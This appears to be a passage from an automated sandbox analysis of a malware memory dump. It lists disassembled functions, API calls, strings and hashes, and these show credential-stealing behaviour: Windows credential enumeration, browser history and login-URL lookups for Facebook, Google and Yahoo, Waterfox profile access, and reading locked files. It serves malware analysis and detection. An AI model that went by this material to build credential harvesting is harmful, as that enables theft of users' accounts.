                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                  • String ID: bhv
                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                  • API String ID: 2941347001-70141382
                                                                                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 644 44671d-446726 641->644 643 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->643 653 4467ac-4467b7 __setusermatherr 643->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 643->654 646 446747-44674b 644->646 647 446728-44672d 644->647 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->643 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 665 446834-446838 660->665 666 44683a-44683e 660->666 663 446845-44684b 661->663 664 446872-446877 661->664 669 446853-446864 GetStartupInfoW 663->669 670 44684d-446851 663->670 664->661 665->660 665->666 666->663 668 446840-446842 666->668 668->663 671 446866-44686a 669->671 672 446879-44687b 669->672 670->668 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2827331108-0
                                                                                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                  • String ID: visited:
                                                                                                                  • API String ID: 1157525455-1702587658
                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                  • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                  • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                  • String ID: |A
                                                                                                                  • API String ID: 77810686-1717621600
                                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                  • String ID: r!A
                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                  • String ID: BIN
                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 697348961-0
                                                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                  • API String ID: 3527940856-11920434
                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
